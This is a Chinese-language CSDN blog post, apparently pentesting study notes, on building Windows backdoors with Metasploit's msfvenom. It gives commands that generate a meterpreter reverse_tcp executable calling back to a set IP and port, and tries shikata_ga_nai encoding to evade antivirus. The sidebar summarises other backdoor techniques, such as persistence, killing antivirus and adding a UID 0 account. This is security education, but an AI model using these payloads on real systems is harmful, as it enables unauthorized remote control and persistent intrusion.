metasploit---创建后门

最新推荐文章于 2024-06-05 14:57:21 发布
最新推荐文章于 2024-06-05 14:57:21 发布
阅读量784 收藏 1
点赞数
分类专栏: Metasploit笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Wu000999/article/details/84329870
版权

后门技术来维持对被攻击系统的访问。后门可帮助攻击者维持系统访问,并使攻击者无须重复地实施攻击就能随意使用被攻击系统。后门就是就是绕过正常的计算机机制,获取计算机访问权限的方法。

常见EXE后门
metasploit提供了三个辅助工具来创建payload后门,分别是msfpayload、msfencode以及msfvenom,不过现在只有msfvenom(里面集成了msfpayload和msfencode)。
在这里插入图片描述

普通后门

msfvenom -p <payload> <payload options> -f <format> -o <path>

msfvenom -p windows/meterpreter/reverse_tcp -f exe -o back.exe  

msfvenom -p windows/meterpreter/reverse_tcp  LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o back.exe  

msfvenom -p windows/meterpreter/reverse_tcp  LHOST=192.168.112.150 LPORT=9000  -f exe -o back.exe

在这里插入图片描述
在这里插入图片描述

不过这样的后门毫无疑问会被kill

在这里插入图片描述

然后我们尝试对后门进行编码,看是否能免杀

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_nai -f exe -o enback.exe

在这里插入图片描述

不过还是被kill。

孤君
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit 渗透测试之制作隐藏后门
weixin_46035615的博客
05-01 2856
1. 实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 2. 实战-Linux 无文件木马程序 3. 实战-使用脚本来进行自动创建后门 4. 系统日志清理
Windows下创建后门隐藏用户的常见方法
SwBack的博客
09-25 908
文章并没有什么技术含量,纯粹是我正好在做这个事情,同时想到自己之前没有写过,所以特意写一遍记录以下windows 下的后门用户主要分为以下4种。
Windows——利用"轻松访问"创建Windows后门
浅浅的博客
02-25 1466
实验环境:虚拟机Win7 概要:当我们每次开启电脑时,都会出现如下界面,点击下图左下角所示的图标——,就会出现 "轻松访问" 的对话框,勾选对话框上任意复选框,系统就会执行其相应的功能!注意,重点来了,这样是不是就意味着,只要我们将 'cmd' 应用程序重命名为 "轻松访问" 选项中任一程序(比如:朗读屏幕内容(讲述人),程序名为Narrator) 的名字,在我们勾选 "讲述人" 复选框并执行...
使用msfveonm后门生成模块和msfconsole获取主机权限(windows)
最新发布
X1DD1Asad343的博客
06-05 283
运行(为了保证设置的参数的正确性,在运行前可以使用show options 命令检查对应参数是否设置正确)监听需要使用到msfconsole(MSF)中的exploit/multi/handler监听模块。配置相应参数(可以使用show options 命令查看参数情况)设置监听端口(在不设置监听端口的情况下,默认监听端口为4444)后门在目标设备上运行后,监听设备即可看到目标设备上线。获取shell,同时查看当前用户权限信息。设置监听主机(一般就是kali的IP)接下来可以尝试输入一些命令。
Metasploit 生成各种后门
热门推荐
CSDN
01-13 1万+
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.
创建linux/unix后门方法总结
weixin_34391445的博客
07-21 179
初级篇   最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。但最好别这么做,因为只要系统管理员检查口令文件就会“漏馅”了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C程序。 <++> backdoor/backdoor1.c #include main() { FILE *fd...
metasploit-framework-6.3.34.zip
09-17
5. 后渗透操作:一旦成功入侵,Metasploit提供了后门模块,可以进行持久化控制,进行进一步的信息收集和横向移动。 三、Metasploit的更新与维护 6.3.34版本的发布意味着开发者们持续在修复已知问题、增强稳定性和...
metasploit-framework-6.3.34.tar.gz
09-17
payload可以是任何操作,如创建后门、收集系统信息或者执行任意命令。Metasploit提供多种payload类型,包括shellcode、Meterpreter等,以适应不同的攻击场景。 3. Encoders:由于许多防火墙和入侵检测系统会过滤...
Metasploit可执行后门.doc
06-25
在文档"Metasploit可执行后门.doc"中,我们看到的是如何利用Metasploit创建持久性的后门并进行远程控制操作。 首先,`detach`命令在Meterpreter会话中被提及,它是用来断开会话连接的。当渗透测试者希望在目标系统...
虚拟现实:Windows操作系统的隐形后门
02-06
虚拟现实这是Windows操作系统的后门项目。目标听众这是概念证明的秘密后门,旨在帮助红色团队在安全评估过程中保持对目标的控制。 该项目还打算公开滥用标准功能的方法。产品特点Windows平台极其隐秘的后门。 ICMP-...
DVWA-master.zip
01-05
4. **命令注入**:当应用程序没有正确过滤用户输入,攻击者可能注入操作系统命令,执行非授权的操作,如读取敏感文件、修改系统配置或创建后门。 5. **认证与权限管理**:DVWA模拟了弱密码策略、会话劫持和CSRF(跨...
MSF生成后门木马
一醉一休的博客
11-19 2421
为了方便平时使用,记录一下操作命令
metasploit基础学习 渗透(拿shell)和后渗透(留后门
qq_38348692的博客
08-10 3500
使用metasploit时,要保持更新的好习惯,更新kali源 ,以及漏洞数据库,更新命令: (1)apt-get update:更新软件包的索引源,作用是同步源的软件包索引 (2)apt-get upgrade: 升级系统上安装的所有软件包 (3)apt-get dist-upgrade: 升级整个linux系统,包括内核升级 专业术语 (1)Auxiliaries:辅助模块,负责执行扫...
MSF生成后门(制作各种shellcode攻击)
tmzy1的博客
03-09 676
是msfpayload,msfencode的结合体,可利用msfvenom生成后门(木马)程序,并在目标机上执行,在本地监听上线。进入msf命令:msconsole再执行msfvenom -h可得到命令帮助。
Kali Linux渗透测试小实践——Metasploit后门木马
PICACHU+++的博客
01-08 2758
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
利用 “轻松访问” 轻松创建Windows后门
橘子女侠
03-04 3813
1. 实验概述 (1)实验环境: win7虚拟机; (2)实验描述: 打开win7虚拟机就可以看到左下角有个轻松访问的标志 ,这里面有六个应用,分别是讲述人,放大镜,高对比度,屏幕键盘,粘滞键,筛选键。这六个应用在不用登录电脑账号和密码的情况下就可以直接使用。这个设计是为了让计算机更方便使用。但是在方便使用的时候,也容易被别人留个后门;如果说这六个应用中的一个被别人暗中替换掉了,那就可以...
渗透工具——kali中msf(后门生成模块msfvenom)
2301_78006725的博客
09-02 739
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
Metasploit(后渗透攻击:操作系统后门
qq_41453632的博客
12-10 3648
   在完成了权限提升之后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复,还可以通过后门继续控制目标系统。 1.Cymothoa后门    Cymothoa是一款可以将ShellCode注入现有进程(即插进程)的后门工具。借助这种注入手段,,他能够把shellcode伪装成常规程序。他所注入的后门程序应当能够与被注入的程序(进...
LINUX(四)渗透测试metasploit
qq_29507011的博客
11-01 2339
攻击方式 利用漏洞 利用后门 一 利用漏洞 1 扫描端口 (一)使用msf扫描 (1)查看可用端口 search portscan (2)使用扫描模块 use ***** (3)查看配置选项,配置扫描模块 show options set LPOST *** (4)运行扫描模块 run (二)使用nmap 扫描 nmap -O -Pn/-p0 IP nmap -sV IP 2 搜索漏洞...
metasploit后渗透攻击:后门
06-02
Metasploit是一款流行的渗透测试工具,可用于发现系统漏洞、攻击目标系统并获取系统权限。后门是一种常见的攻击手段,它可让黑客在未来再次访问受害者系统而不被发现。使用Metasploit创建后门非常简单,只需要执行以下步骤: 1. 使用Metasploit的exploit模块攻击目标系统,获取系统权限。 2. 利用Metasploit的post模块创建后门,例如使用“post/windows/manage/migrate”模块将后门进程迁移到其他进程中。 3. 确保后门能够在系统启动时自动运行,例如使用“run persistence”命令创建持久化后门。 4. 隐藏后门进程,例如使用“run killav”命令杀死杀毒软件进程,以免被杀毒软件发现。 5. 等待受害者再次连接后门并获取系统权限。 注意:上述操作仅用于合法的渗透测试和安全审计,任何未经授权的攻击行为都是非法的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值